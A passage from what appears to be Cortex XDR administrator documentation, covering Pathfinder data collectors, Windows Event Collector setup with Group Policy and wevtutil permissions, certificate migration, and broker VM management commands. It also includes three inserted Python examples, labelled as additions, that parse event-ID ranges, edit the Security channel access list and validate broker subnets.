recommends you limit the number of users granted access to the SA account, as it
poses a credential compromise security threat.

• Domain—Domain name of your network.
• (Optional) Domain Suffixes—Domain suffixes required for DNS resolving within your network.
The domain suffixes list is read-only and populated by your defined Network Configurations.
• Authentication Method—Select either Kerberos or NTLM.

When selecting Kerberos, the Broker requires access to the domain controllers over port 88
to acquire the authentication ticket. It is recommended to use Kerberos
for better security.
• Define the access credentials using either Domain Credentials or your CyberArk AAM
parameters.
To define the access credentials, enter:
• User Name—User name used by Pathfinder to access your target host.
• Password—Password used by Pathfinder to access your target host.

Only encrypted credentials are stored on the broker VM.

To allow Pathfinder to use credentials stored in your CyberArk vault, enter the following
parameters. Make sure you are following the CyberArk guidelines.
• URL—Your CyberArk AAM URL address.
• Port—Your CyberArk AAM port number.
• App ID—The application ID configured in your CyberArk AAM. The ID allows you to access the
path to where credentials are stored in the CyberArk vault.
• Query—Define the CyberArk AAM path to the credentials required by Pathfinder to access the
host. Make sure you are following the CyberArk formatting guidelines.

• Browse for the Client Certificate, Client Key, and CA Certificate you use for client authentication.
Cortex XDR will notify you when your certificates are about to expire.

Credentials are not stored on the broker VM, Pathfinder queries CyberArk each
time according to the defined parameters.
• Test the credentials and Pathfinder permissions to ensure the broker VM can successfully collect
data from your defined hosts.

Testing may take a few minutes to complete but ensures that Pathfinder can indeed
deploy a data collector.
Select Next.
2. Define the data collector Settings.

• Select on which Targets to deploy the data collector. Target types are detected according to the
operating system.
• All—Deploy on all assets within your network.
• Servers—Deploy only on servers.
• Workstations—Deploy only on workstations.
• Define the Proxy Settings.
By default the proxy settings are disabled and collected data is sent directly to the cloud. If you want
to enable the proxy, select one of the following options:
• Use Agent Proxy Settings—Collected data will be routed using the settings provided in the
Agent Proxy applet. The Agent Proxy applet must be enabled for this setting to work.
• Use Custom Proxy—Define the IP address and port to route the data.
Select Next.

3. Select the IP Address Ranges to scan from your defined Network Configurations and deploy the
data collector. You can Add IP Address Ranges if you don’t see a range in the populated list.
By default, every IP address range uses the Pathfinder credentials and settings you defined in the
Credentials section and is labeled as an Applet Configuration.
If you want to configure other credentials for a specific range, use the right pane to override the
settings. IP address ranges you edit are labeled as a Custom Configuration. Make sure to Test the
credentials for this specific range.

The Pathfinder configuration must contain at least one IP address range to run. To
avoid collision, IP address ranges can only be associated with one pathfinder applet.

4. Activate your Pathfinder.


After a successful activation, the Apps field displays the Pathfinder - Active, Connected.

STEP 4 | In the Apps field, select Pathfinder to view the following applet metrics:
• Connectivity Status—Whether the applet is connected to Cortex XDR.
• Handled Tasks—How many collectors are in progress, pending, or successfully running out of the
number of collectors that need to be set up.
• Failed Tasks—How many collectors have failed.
• Resources—Displays the amount of CPU, Memory, and Disk space the applet is using.

STEP 5 | Manage the Pathfinder.
Right-click your broker VM and select:
• Pathfinder > Edit Configuration to redefine your pathfinder configurations.
• Pathfinder > Edit Credentials to redefine the user name and password.
You can select to edit credentials for multiple Pathfinder applets. However, only IP address ranges
that are using the default defined credentials, labeled as Applet Configuration, will adopt your changes.
• Pathfinder > Deactivate to remove pathfinder.

STEP 6 | Track the Pathfinder Data Collector.


After Pathfinder has been activated, when an analytics type alert is triggered on an
unmanaged host, the data collector is deployed to unmanaged assets within the defined IP address
ranges and domain names.

The data collector is only deployed on unmanaged hosts. If you want to install the Cortex
XDR agent on an unmanaged host, you must first remove the collector.

To track the data collector:


1. In Cortex XDR, navigate to Settings > Broker > Pathfinder Collection Center.

The Pathfinder Collection Center table displays the following fields for each of the deployed
collectors:

Field Description

Collector Install Time Timestamp of when the collector was installed on the host.

Initiating Alert ID Alert ID of the analytics alert that triggered the collector.

Initiating VM Name of the broker VM that initiated the collector.

Last Seen Timestamp of the last collector heartbeat.

Result Status of the collection process, for example Collection Completed.

Start Time Timestamp of when the collector was triggered.

Status Status of the collector on the host. Can be one of:
• Pending
• Running
• Completed
• Failed
• Removed

Target IP IP address of the host scanned by the collector.


2. Manage the collector.
• Set Collectors Number to limit the number of collectors you want to deploy in your environment.
• Locate the collector, right-click and select:
• Remove Collector—Uninstall the collector from the host.
• View Initiating alert—Pivot to the Alerts Table filtered according to the initiating alert.
• Retrieve Logs—Upload logs from the collector.
• Download Logs—Download the collector logs to your local machine.
When you select and right-click the Target IP field, you can choose to view the IP address in the
IP View or Open in Quick Launcher.

STEP 7 | Query the collector data.


Data gathered by the data collector can be queried and investigated from the Query Center. To run a
query on the EDR data from an unmanaged host:
1. Navigate to Investigation > Query Center.
2. Select the type of query you want to run and enter the search criteria.
When defining the Host attributes, for INSTALLATION TYPE make sure to select Data Collector.
3. View your query results.

Activate the Windows Event Collector


After you have configured and registered your broker VM, activate your Windows Event Collector
application.
The Windows Event Collector (WEC) runs on the broker VM collecting event logs from Windows Servers,
including Domain Controllers (DCs). To enable the collection of the event logs, you need to configure them
as Windows Event Forwarders (WEFs) and establish trust between them and the WEC. Establishing trust
between the WEFs and the WEC is achieved by mutual authentication over TLS using server and client
certificates.
The WEF, a WinRM plugin, runs under the Network Service account. Therefore, you need to provide the
WEFs with the relevant certificates and grant the account access permissions to the private key used for
client authentication, that is, to authenticate with the WEC.
Ensure you meet the following prerequisites before activating the collector:
• Cortex XDR Pro per TB license
• Broker VM version 8.0 and later
• You have knowledge of Windows Active Directory and Domain Controllers.
• Broker VM is registered in the DNS and its FQDN is resolvable from the events forwarder (Windows
server).
• Windows Server 2012 or later.

STEP 1 | In Cortex XDR, navigate to Settings > Broker > VMs and locate your broker VM.

STEP 2 | Right-click and select Windows Event Collector > Activate.


(Optional) If you already have a Windows Event Collector signed certificate, migrate your existing CA to
the Cortex XDR console.

STEP 3 | In the Activate Windows Event Collector window, define the following:

• Set your Broker VM FQDN as it will be defined in your Domain Name System (DNS). This enables
connection between Cortex XDR and your Windows Event Collector.
• Define the events collected by the applet. This lists event sources from which you want to collect
events:
• Source—Select from the pre-populated list with the most common event sources on Windows
Servers. The event source is the name of the software that logs the events.
A source provider can only appear once in your list.
• Min. Event Level—Minimum severity level of events that are collected.
• Event IDs Group—Whether to Include, Exclude, or collect All event ID groups.
• (Optional) Event IDs— Define specific event IDs or event ID ranges you want to collect.

Make sure to save after each entry.

By default, Cortex XDR collects Palo Alto Networks predefined Security events that are used by the
Cortex XDR detectors.

Removing the Security collector interferes with the Cortex XDR detection functionality.
Restore to Default to reinstate the Security event collection.
When selecting event sources, ensure the event source is enabled on the Windows events forwarder. If
the source is not enabled, the source configuration (in the given row) will fail. For more information see
the Windows documentation.
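Both the Network Mapper (ports such as 80-83, 443 for a TCP SYN scan) and the Windows Event Collector (specific event IDs or event ID ranges) accept the same single-values-and-ranges notation. The following added Python example, not code from this guide or from Cortex XDR, parses that notation and applies a Min. Event Level and an Include/Exclude/All event ID group to a constructed set of Windows events, so you can see which records a given source row would collect. Level names are the Windows event log levels; the event IDs in the sample are common Security and System log IDs, but the records themselves are constructed.

```python
"""Parse the 'single values and ranges' spec and apply event-collection filters.

Added example, not code from the Cortex XDR guide or product. The guide lets
you enter values such as "80-83, 443" for Network Mapper TCP SYN ports and
specific event IDs or ranges for the Windows Event Collector; this shows one
parser for that notation and how Min. Event Level together with an
Include/Exclude/All event ID group narrows what a source would collect. The
sample events are constructed; level names follow the Windows event log levels.
"""
from typing import Dict, List, Set

# Windows event log level numbers (lower is more severe). Security channel audit
# records are written at LogAlways (0) and therefore pass any minimum level.
LEVELS = {"LogAlways": 0, "Critical": 1, "Error": 2, "Warning": 3,
          "Information": 4, "Verbose": 5}


def parse_ranges(spec: str, low: int = 0, high: int = 65535) -> Set[int]:
    """Expand "80-83, 443" into {80, 81, 82, 83, 443}; reject malformed items."""
    values: Set[int] = set()
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        if "-" in item:
            start_s, end_s = item.split("-", 1)
            start, end = int(start_s), int(end_s)
            if start > end:
                raise ValueError(f"range {item!r} runs backwards")
        else:
            start = end = int(item)
        if start < low or end > high:
            raise ValueError(f"{item!r} is outside {low}-{high}")
        values.update(range(start, end + 1))
    return values


def select_events(events: List[Dict], min_level: str, id_group: str,
                  event_ids: str = "") -> List[int]:
    """Return the IDs of events a source configured with these settings would collect."""
    if id_group not in {"Include", "Exclude", "All"}:
        raise ValueError("id_group must be Include, Exclude or All")
    wanted = parse_ranges(event_ids, 1, 65535) if event_ids else set()
    threshold = LEVELS[min_level]
    selected = []
    for event in events:
        if LEVELS[event["level"]] > threshold:  # less severe than the minimum level
            continue
        if id_group == "Include" and event["id"] not in wanted:
            continue
        if id_group == "Exclude" and event["id"] in wanted:
            continue
        selected.append(event["id"])
    return selected


# Constructed sample: three Security audit records and two System log events.
SAMPLE_EVENTS = [
    {"id": 4624, "level": "LogAlways", "source": "Security"},   # logon success
    {"id": 4625, "level": "LogAlways", "source": "Security"},   # logon failure
    {"id": 1102, "level": "LogAlways", "source": "Security"},   # audit log cleared
    {"id": 7036, "level": "Information", "source": "System"},   # service state change
    {"id": 7034, "level": "Error", "source": "System"},         # service terminated unexpectedly
]

if __name__ == "__main__":
    print(sorted(parse_ranges("80-83, 443")))
    print(select_events(SAMPLE_EVENTS, "Warning", "Include", "4624-4625, 1102"))
    print(select_events(SAMPLE_EVENTS, "Error", "All"))
```

Because Security audit records carry level 0, a Min. Event Level of Error on the Security source still collects all of them; the event ID group is the control that actually narrows that source.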

STEP 4 | Activate your configurations.


After a successful activation, the Apps field displays the Windows Event Collector - Active,
Connected.

STEP 5 | In the Windows Event Forwarder Configuration window:

1. Copy the Subscription Manager URL. This will be used when you configure the subscription
manager in the GPO (Group Policy Object) on your DC.
2. Define Client Certificate Export Password used to secure the downloaded Windows Event
Forwarders (WEF) certificate used to establish connection between Cortex XDR and the Windows
Event collector. You will need this password when the certificate is imported to the events forwarder.
3. Download the WEF certificate in a PFX format.
To view your Windows Event Forwarder Configuration details at any time, select your Broker VM,
right-click and navigate to Windows Event Collector > Configure Forwarder.
Cortex XDR monitors the certificate and triggers a Certificate Expiration notification 30 days prior to
the expiration date. The notification is sent daily specifying the number of days left on the certificate, or
if the certificate has already expired.

STEP 6 | Install your WEF Certificate on the events forwarder to establish connection.
1. Copy the PFX file you downloaded from the Cortex XDR console to your events forwarder, double-
click the file and import it to Local Machine.
2. Run certlm.msc.
3. Navigate to Certificates > Personal and verify the following:
• In the Personal > Certificates folder, ensure the certificate has been imported.
• In the Trusted Root Certification Authorities folder, ensure the CA was added.

4. Navigate to Certificates > Personal > Certificates.
5. Right-click the certificate and navigate to All tasks > Manage Private Keys.
6. In the Permissions window, select Add and in the Enter the object name section, enter NETWORK
SERVICE followed by OK.

Verify that the name appears under Group or user names.

STEP 7 | Add the Network Service account to the event forwarder’s Event Log Readers group.
1. To enable event forwarders to forward events, the Network Service account must be a member of
the Active Directory Event Log Readers group. In PowerShell, execute the following command on the
event forwarder:

C:\> net localgroup "Event Log Readers" "NT Authority\Network Service" /add

2. Grant access to view the security event logs.

1. Run wevtutil gl security and take note of your channelAccess value.
2. Run wevtutil sl security "/ca:<channelAccess value>(A;;0x1;;;S-1-5-20)". The appended ACE grants
read access (0x1) to the Network Service account (SID S-1-5-20).
Make sure you grant access on each of your event forwarder hosts.
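The channelAccess edit in step 2 above, as an added Python example that is not code from this guide or from Cortex XDR: it parses the SDDL out of wevtutil gl security output, appends the (A;;0x1;;;S-1-5-20) allow-read ACE for the Network Service account only if that SID does not already hold read access, keeps any SACL (S:) part that follows the DACL, and prints the wevtutil sl command to run. The sample wevtutil output is constructed to resemble a default Security channel; take the real value from each forwarder.

```python
"""Grant the Network Service account read access to the Security channel.

Added example, not code from the Cortex XDR guide or product. The guide has you
take the channelAccess value from `wevtutil gl security` and re-set it with
(A;;0x1;;;S-1-5-20) appended. This implements that edit idempotently: parse the
channelAccess SDDL, add the ACE only if the Network Service SID (S-1-5-20) does
not already hold read (0x1), keep any SACL (S:) part after the DACL, and emit
the wevtutil command to run. SAMPLE_GL_OUTPUT is constructed, not captured.
"""
import re
from typing import List, Optional

NETWORK_SERVICE_SID = "S-1-5-20"
READ_ACE = f"(A;;0x1;;;{NETWORK_SERVICE_SID})"

# Constructed: the shape of `wevtutil gl security` output on a default host.
SAMPLE_GL_OUTPUT = """name: security
enabled: true
type: Admin
owningPublisher:
isolation: Custom
channelAccess: O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)
logging:
  logFileName: %SystemRoot%\\System32\\Winevt\\Logs\\Security.evtx
  retention: false
  autoBackup: false
  maxSize: 20971520
"""


def parse_channel_access(gl_output: str) -> str:
    """Pull the channelAccess SDDL string out of `wevtutil gl <channel>` output."""
    for line in gl_output.splitlines():
        key, _, value = line.partition(":")
        if key.strip() == "channelAccess":
            return value.strip()
    raise ValueError("channelAccess line not found")


def dacl_aces(sddl: str) -> List[str]:
    """ACE strings of the DACL only (everything between D: and any S: SACL)."""
    start = sddl.find("D:")
    if start == -1:
        raise ValueError("SDDL has no DACL (D:) section")
    end = sddl.find("S:", start + 2)
    dacl = sddl[start:] if end == -1 else sddl[start:end]
    return re.findall(r"\([^)]*\)", dacl)


def _access_mask(field: str) -> Optional[int]:
    """Numeric access mask for hex masks such as 0x1; None for letter-coded rights."""
    try:
        return int(field, 16) if field.lower().startswith("0x") else None
    except ValueError:
        return None


def grants_read(sddl: str, sid: str = NETWORK_SERVICE_SID) -> bool:
    """True if an allow ACE for `sid` already includes the read bit (0x1)."""
    for ace in dacl_aces(sddl):
        parts = ace.strip("()").split(";")
        if len(parts) < 6 or parts[0] != "A" or parts[5] != sid:
            continue
        mask = _access_mask(parts[2])
        if mask is not None and mask & 0x1:
            return True
    return False


def with_network_service_read(sddl: str) -> str:
    """Return the SDDL with the read ACE appended to the DACL; unchanged if present."""
    if grants_read(sddl):
        return sddl
    start = sddl.find("D:")
    if start == -1:
        raise ValueError("SDDL has no DACL (D:) section")
    sacl_at = sddl.find("S:", start + 2)
    if sacl_at == -1:
        return sddl + READ_ACE
    return sddl[:sacl_at] + READ_ACE + sddl[sacl_at:]


def set_command(sddl: str) -> str:
    """The wevtutil invocation the guide describes, with the updated SDDL."""
    return f'wevtutil sl security "/ca:{sddl}"'


if __name__ == "__main__":
    current = parse_channel_access(SAMPLE_GL_OUTPUT)
    print("current :", current)
    print("run     :", set_command(with_network_service_read(current)))
```

Running the same edit twice on a forwarder would otherwise append a second identical ACE; the grants_read check is what keeps the channel ACL clean when the step is scripted across many hosts.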

STEP 8 | Create a WEF Group Policy which applies to every Windows server you want to configure as a
WEF.
1. Open gpmc.msc.
2. Create a new Group Policy and name it Windows Event Forwarding.
3. In the Group Policy Management window, navigate to Domains > your domain name > Windows
Event Forwarding, right-click and select Edit.

4. In the Group Policy Management Editor:


• Set the WinRM service for automatic startup.
• Navigate to Computer Configuration > Policies > Windows Settings > Security Settings >
System Services, and double-click Windows Remote Management.
• Mark Define this policy setting and select Automatic.
• Enable collection of Broker VM supported Kerberos events; Kerberos pre-authentication,
authentication, request, and renewal tickets.
• Navigate to Computer Configuration > Policies > Advanced Audit Policy Configuration >
Audit Policy > Account Logon.
• Configure Audit Kerberos Authentication Service and Audit Kerberos Service Ticket
Operations to Success and Failure.
5. Configure the subscription manager.
Navigate to Computer Configuration > Policies > Administrative Templates > Windows
Components > Event Forwarding, and double-click Configure target Subscription Manager.

In the Configure target Subscription Manager window:
• Mark Enabled.
• Select Show and paste the Subscription Manager URL you copied from the Cortex XDR console.
6. Add Network Service to the Event Log Readers group.
Navigate to Computer Configuration > Preferences > Control Panel Settings > Local Users and
Groups, right-click and select New Local Group.

In the Event Log Readers (built-in) Properties window:
• In the Group name field, select Event Log Readers (built-in).
• In the Members section, Add and enter Network Service in the Name field.

You must type the name; it cannot be selected using the browse button.

• OK.
7. Configure the Windows Firewall.

If Windows Firewall is enabled on your event forwarders, you will have to define an
outbound rule to enable the WEF to reach port 5986 on the WEC.

Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows
Firewall with Advanced Security > Outbound Rules, right-click and select New Rule.
Configure the following:
• Type—Port
• TCP—Port 5986
• Allow the connection
• Mark Domain, disable Private and Public
• Name the rule Windows Event Forwarding
• Finish

STEP 9 | Apply the WEF Group Policy.


Link the policy to the OU or the group of Windows servers you would like to configure as event
forwarders. In the following flow, the domain controllers are configured as event forwarders.
1. Navigate to Group Policy Management > <your domain name > Domain Controllers, right-click and
select Link an existing GPO....
2. Select the WEF Group Policy you created, Windows Event Forwarding.

3. In an administrative PowerShell console, execute the following commands:

PS C:\Users\Administrator> gpupdate /force
PS C:\Users\Administrator> Restart-Service WinRM

STEP 10 | Verify Windows Event Forwarding.


1. In an administrative PowerShell console, run the following command:

PS C:\Users\Administrator> Get-WinEvent Microsoft-Windows-WinRM/Operational -MaxEvents 10

2. Look for WSMan operation EventDelivery completed successfully messages. These indicate that events
were forwarded successfully.

STEP 11 | (Optional) Manage the Windows Event Collector.


After the Windows Event Collector has been activated in the Cortex XDR Management Console, right-
click your broker VM and select:
• Windows Event Collector > Configure Forwarder to define the event configuration information.
• Windows Event Collector > Deactivate to disable the Windows Event Collector.
• Windows Event Collector > Collection Configuration to view or edit existing or add new events to
collect.

STEP 12 | (Optional) In the Apps field, select Windows Event Collector to view the following applet
metrics:
• Connectivity Status—Whether the applet is connected to Cortex XDR.
• Logs Received and Logs Sent—Number of logs received and sent by the applet per second over the
last 24 hours. If the number of incoming logs received is larger than the number of logs sent, it could
indicate a connectivity issue.
• Resources—Displays the amount of CPU, Memory, and Disk space the applet is using.

Migrate Existing Windows Event Collector Certificate
For users who are running broker VM version 8.0 and later and already have a signed Windows Event
Collector certificate, it’s best to migrate your CA to the Cortex XDR console to better manage the connection
between the Windows Event Collector and the Broker VM.
To migrate your existing Windows Event Collector signed certificate to the Cortex XDR console:

STEP 1 | In Cortex XDR, navigate to Settings > Broker > VMs and locate your broker VM.

STEP 2 | Right-click and select Applet Management > Windows Event Forwarder Migration.

STEP 3 | In the Windows Event Forwarder Migration window:


1. Securely import the signed certificate and key from your Linux server by copying the Run Export
Command and running it with OpenSSL. Make sure you enter your certificate and key file names.
2. Copy the auto-generated password. Provide this password when running the OpenSSL
command to authenticate the import.
3. Upload CA Certificate by Drag and Drop or browse for your certificate.
4. Upload your certificate to the Cortex XDR console.
Cortex XDR displays an Action Succeeded notification.

After a successful migration, your certificates are managed and signed by Cortex XDR.

It is recommended to delete the CA PFX file and private key from the secured host
where the certificates were signed.

Manage Your Broker VMs
After you configured the broker VMs, you can manage your broker VMs from the Cortex XDR console.
• View Broker VM Details
• Edit Your Broker VM Configuration
• Collect Broker VM Logs
• Reboot a Broker VM
• Upgrade a Broker VM
• Open Remote Terminal
• Remove a Broker VM

View Broker VM Details


In Cortex XDR, navigate to Settings > Broker > VMs to view detailed information
about your registered broker VMs.
The Broker VMs table enables you to monitor and manage your broker VM and applet connectivity status,
version management, device details, and usage metrics.

The following table describes both the default fields and the additional optional fields that you can add to
the Broker VMs table using the column manager, and lists the fields in alphabetical order.

Status Indicator
    Identifies, in the following columns:
    • DEVICE NAME—Whether the broker machine is registered and connected to Cortex XDR.
    • VERSION—Whether the broker VM is running the latest version.
    • APPS—Whether the available applications are connected to Cortex XDR.
    Colors depict the following statuses:
    • Black—Disconnected from Cortex XDR
    • Red—Disconnected from Cortex XDR
    • Orange—Past Version
    • Green—Connected, Current Version

Check box
    Select one or more broker devices on which to perform actions.

APPS
    List of active or inactive applets and the connectivity status for each.

CPU USAGE
    CPU usage of the broker device in percentage, synced every 5 minutes.

CONFIGURATION STATUS
    Broker VM configuration status. The status is one of the following, according to changes made to any of
    the broker VM configurations:
    • up to date—Broker VM configuration changes made through the Cortex XDR console have been applied.
    • in progress—Broker VM configuration changes made through the Cortex XDR console are being applied.
    • submitted—Broker VM configuration changes made through the Cortex XDR console have reached the
    broker machine and are awaiting implementation.
    • failed—Broker VM configuration changes made through the Cortex XDR console have failed. Open a
    Palo Alto Networks support ticket.

DEVICE ID
    Device ID allocated to the broker machine by Cortex XDR after registration.

DEVICE NAME
    Same as the Device ID.
    An icon notifies of an expired broker. To reconnect, generate a new token and re-register your broker
    as described in steps 1 through 7 of Configure the Broker VM. Once registered, all previous broker
    configurations are reinstated.

DISK USAGE
    Disk usage of the broker as the portion of computer storage that is currently in use.
    Notifications about low disk space appear in the Notification Center.

EXTERNAL IP
    The IP interface the broker is using to communicate with the server.
    For AWS and Azure cloud environments, the field displays the Internal IP value.

INTERNAL IP
    All IP addresses of the different interfaces on the device.

MEMORY USAGE
    Memory usage of the broker device in percentage, synced every 5 minutes.

STATUS
    Connection status of the broker device, either Connected or Disconnected.
    Disconnected broker devices do not display CPU Usage, Memory Usage, and Disk Usage information.
    Notifications about a broker VM losing connectivity to Cortex XDR appear in the Notification Center.

UPGRADE TIME
    Timestamp of when the broker device was upgraded.

VERSION
    Version number of the broker device. If the status indicator is not green, the broker is not running
    the latest version.
    Notifications about an available new broker VM version appear in the Notification Center.

Edit Your Broker VM Configuration


After configuring and registering your broker VM, navigate to Cortex XDR app > Settings > Broker >
VMs to edit existing configurations and define additional settings.

STEP 1 | In the Broker VMs table, locate your broker VM, right-click and select Broker Management >
Configure.
If the broker VM is disconnected, you can only View the configurations.

STEP 2 | In the Broker VM Configurations window, define the following settings:

• Edit the existing Network Interfaces, Proxy Server, NTP Server, and SSH Access configurations.
• (Requires Broker VM 8.0 and later) Device Name
Change the name of your broker VM device by selecting the pencil icon. The new name will
appear in the Broker VMs table.
• (Requires Broker VM 8.0 and later) (Optional) Internal Network
Enter a network subnet to avoid the broker VM's Docker containers colliding with your internal network. By
default, the Network Subnet is set to 172.17.0.1/16.
The Internal IP must be:
  • Formatted as prefix/mask, for example 192.0.2.1/24.
  • Within the /8 to /24 range.
  • Not configured to end with a zero.
For Broker VM version 9.0 and lower, Cortex XDR will accept only 172.17.0.0/16.
• Auto Upgrade
Enable or Disable automatic upgrade of the broker VM. By default, auto upgrade is enabled. If you
disable auto-upgrade, new features and improvements will require a manual upgrade.
• Monitoring
Enable or Disable local monitoring of the broker VM usage statistics in Prometheus
metrics format, allowing you to tap in and export data by navigating to http://
<broker_vm_address>:9100/metrics/. By default, monitoring of your broker VM is disabled.
• (For Broker VM 7.4.5 and earlier) SSH Access
Enable or disable SSH access for the Palo Alto Networks support team using a Cortex XDR token.
Enabling allows the Palo Alto Networks support team, not the customer, to connect to the broker VM
remotely with the generated password.
Make sure you save the password before closing the window. The only way to re-generate a password is to
disable SSH and re-enable it.
• Broker UI Password
Reset your current Broker VM Web UI password. Define and Confirm your new password. The password
must be at least 8 characters.

STEP 3 | Save your changes.
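The Internal Network rules above (prefix/mask format, /8 to /24, no trailing zero, and the single value accepted by Broker VM 9.0 and lower), as an added pre-check you can run before entering a subnet in the console. This is example code, not Cortex XDR or Broker VM code; the overlap check against your own site networks is an addition that the page does not describe, and the version string comparison is an assumption.

```python
import ipaddress
from typing import List

# Rules from the Internal Network setting described in the Broker VM Configurations window;
# the default, the 9.0-and-lower value and the mask range are the page's statements.
DEFAULT_INTERNAL_NETWORK = "172.17.0.1/16"
LEGACY_ONLY_NETWORK = "172.17.0.0/16"     # sole value accepted by Broker VM 9.0 and lower

ERR_FORMAT = "must be formatted as prefix/mask, for example 192.0.2.1/24"
ERR_RANGE = "mask must be within the /8 to /24 range"
ERR_ZERO = "prefix cannot end with a zero"


def version_tuple(version: str) -> tuple:
    """'9.0' -> (9, 0), so broker VM versions compare numerically (assumed dotted-integer form)."""
    return tuple(int(part) for part in version.split("."))


def validate_internal_network(value: str, broker_version: str = "10.0") -> List[str]:
    """Return the list of rule violations for a proposed Internal Network value.

    An empty list means every rule on the page is satisfied."""
    if version_tuple(broker_version) <= (9, 0):
        # Older brokers take exactly one value; none of the other rules apply.
        if value == LEGACY_ONLY_NETWORK:
            return []
        return [f"Broker VM {broker_version} accepts only {LEGACY_ONLY_NETWORK}"]

    prefix, sep, mask = value.partition("/")
    if not sep:
        return [ERR_FORMAT]
    try:
        addr = ipaddress.IPv4Address(prefix)
        mask_len = int(mask)
    except ValueError:            # AddressValueError is a ValueError subclass
        return [ERR_FORMAT]

    problems = []
    if not 8 <= mask_len <= 24:
        problems.append(ERR_RANGE)
    if addr.packed[-1] == 0:      # last octet of the prefix is zero
        problems.append(ERR_ZERO)
    return problems


def overlapping_networks(value: str, internal_networks: List[str]) -> List[str]:
    """Return the site networks that the broker's Docker subnet would collide with.

    Added check: the setting exists to avoid such collisions, so test for them up front."""
    docker_net = ipaddress.IPv4Network(value, strict=False)   # host bits allowed, as in 172.17.0.1/16
    return [n for n in internal_networks
            if ipaddress.IPv4Network(n, strict=False).overlaps(docker_net)]


if __name__ == "__main__":
    # Constructed example: the default Docker subnet collides with an RFC 1918 range in use on site.
    site_networks = ["10.0.0.0/8", "172.16.0.0/12"]
    for candidate in [DEFAULT_INTERNAL_NETWORK, "192.0.2.1/24", "10.0.0.0/8", "192.0.2.1/26"]:
        print(candidate, validate_internal_network(candidate) or "ok",
              "overlaps:", overlapping_networks(candidate, site_networks))
```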

Collect Broker VM Logs


Cortex XDR allows you to collect your broker VM logs directly from the Cortex XDR console.

STEP 1 | Navigate to the Cortex XDR app > Settings > Broker > VMs table.

STEP 2 | Locate your broker VM, right-click and select Broker Management > Download Latest Logs.
Logs are generated automatically after approximately 30 seconds and are available for 24 hours after the
logs have been downloaded.

Reboot a Broker VM
Cortex XDR allows you reboot your broker VM directly from the Cortex XDR console.

STEP 1 | Navigate to the Cortex XDR app > Settings > Broker > VMs table.

STEP 2 | Locate your broker VM, right-click and select Broker Management > Reboot VM.

Upgrade a Broker VM
Cortex XDR allows you to upgrade your broker VM directly from the Cortex XDR console.

STEP 1 | Navigate to the Cortex XDR app > Settings > Broker > VMs table.

STEP 2 | Locate your broker VM, right-click and select Broker Management > Upgrade Broker version.
Upgrading your broker VM takes approximately 5 minutes.

Open Remote Terminal


Cortex XDR allows you to remotely connect to a broker VM directly from the Cortex XDR console.

STEP 1 | Navigate to the Cortex XDR app > Settings > Broker > VMs table.

STEP 2 | Locate the broker VM you want to connect to, right-click and select Open Remote Terminal.
Cortex XDR opens a CLI window where you can perform the following commands:
• Logs
Broker VM logs are located in the /data/logs/ folder and contain the applet name in the file name.
For example, the folder /data/logs/[applet name] contains container_ctrl_[applet name].log.
• Ubuntu Commands
Cortex XDR Broker VM supports all Ubuntu commands. For example, telnet 10.0.0.10 80 or
ifconfig -a.
• Sudo Commands
Cortex XDR requires you to use the following values when running commands:
Applet Names
• Agent Proxy—tms_proxy
• Syslog Collector—anubis
• WEC—wec
• Network Mapper—network_mapper
• Pathfinder—odysseus
Services
• Upgrade—zenith_upgrade
• Frontend service—webui
• Sync with Cortex XDR—cloud_sync
• Internal messaging service (RabbitMQ)—rabbitmq-server
• Uploads metrics to Cortex XDR—metrics_uploader
• Prometheus node exporter—node_exporter
• Backend service—backend

applets_restart
    Restarts one or more applets.
    Example: > sudo applets_restart wec

applets_start
    Starts one or more applets.
    Example: > sudo applets_start wec

applets_status
    Checks the status of one or more applets.
    Example: > sudo applets_status wec

applets_stop
    Stops one or more applets.
    Example: > sudo applets_stop wec

services_restart
    Restarts one or more services. OS services are not supported.
    Example: > sudo services_restart cloud_sync

services_start
    Starts one or more services.
    Example: > sudo services_start cloud_sync

services_status
    Checks the status of one or more services.
    Example: > sudo services_status cloud_sync

services_stop
    Stops one or more services.
    Example: > sudo services_stop cloud_sync

set_ui_password.sh
    Changes the password of the Broker VM Web UI. Run the command, then enter the new password
    followed by Ctrl+D.
    Example: > sudo set_ui_password.sh

tcpdump
    Linux command to capture network traffic. You must use the -w flag in order to write the output
    to a file.
    Example: > sudo tcpdump -i eth0 -w /tmp/packets.pcap

kill
    Linux kill command.
    Example: > sudo kill [some pid]

route
    Modify your IP address routing.
    Example: /sbin/route

edit_routes
    Update static network routes. Executing this command opens an editor (vi); enter the parameters
    on a new line, save, exit, and restart the machine and broker VM.
    Broker VMs that were migrated from Pathfinder VM do not currently support this function.
    Example: sudo edit_routes

hostnamectl
    Check and update the machine hostname on a Linux operating system. Restart the machine after
    running the command.
    Example: sudo hostnamectl set-hostname <new_host_name>

Remove a Broker VM
Cortex XDR allows you to remove a broker VM directly from the Cortex XDR console.

STEP 1 | Navigate to the Cortex XDR app > Settings > Broker > VMs table.

STEP 2 | Locate your broker VM, right-click and select Broker Management > Remove Broker.

Broker VM Notifications
To help you monitor your broker VM version and connectivity effectively, Cortex XDR sends notifications to
your Cortex XDR console Notification Center.
Cortex XDR sends the following notifications:
• New Broker VM Version—Notifies when a new broker VM version has been released.
  • If the broker VM Auto Upgrade is disabled, the notification includes a link to the latest release
  information. It is recommended that you upgrade to the latest version.
  • If the broker VM Auto Upgrade is enabled, 12 hours after the release you are notified of the latest
  upgrade, or you are notified that the upgrade failed. In such a case, open a Palo Alto Networks
  Support Ticket.
• Broker VM Connectivity—Notifies when the broker VM has lost connectivity to Cortex XDR.
• Broker VM Disk Usage—Notifies when the broker VM is utilizing over 90% of the allocated disk space.

External Data Ingestion
> External Data Ingestion Vendor Support
> Visibility of Logs and Alerts from External Sources in Cortex XDR
> Ingest Network Connection Logs
> Ingest Authentication Logs and Data
> Ingest Operation and System Logs from Cloud Providers
> Ingest External Alerts

External Data Ingestion Vendor Support
Ingesting logs and data requires a Cortex XDR Pro per TB license.

To provide you with a more complete and detailed picture of the activity involved in an incident, you can
ingest data from a variety of external, third-party sources in Cortex XDR.
When ingesting data from an external source, Cortex XDR creates a dataset that you can query using XQL.
Datasets created in this way follow the naming convention:

<vendor_name>_<product name>_raw

For example: cisco_asa_raw


The datatypes used for the fields in an imported dataset are automatically assigned based on the input
content. Fields can have a datatype of string, int, float, array, time, or boolean. All other fields are
ingested as a JSON object.

Log Type and Vendor Support

Network Connections
